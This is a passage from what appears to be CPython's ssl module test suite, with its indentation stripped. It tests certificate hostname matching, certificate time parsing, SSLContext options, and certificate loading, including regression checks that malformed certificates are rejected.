certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # wildcard in first fragment and IDNA A-labels in subsequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows for levels between 0-5
# with OpenSSL defaulting to 1, however some vendors override the
# default value (e.g. Debian defaults to 2)
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
            # OpenSSL has a fixed limit on the password buffer; PEM_BUFSIZE
            # is generally 1 KB.  Pass a password longer than that.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
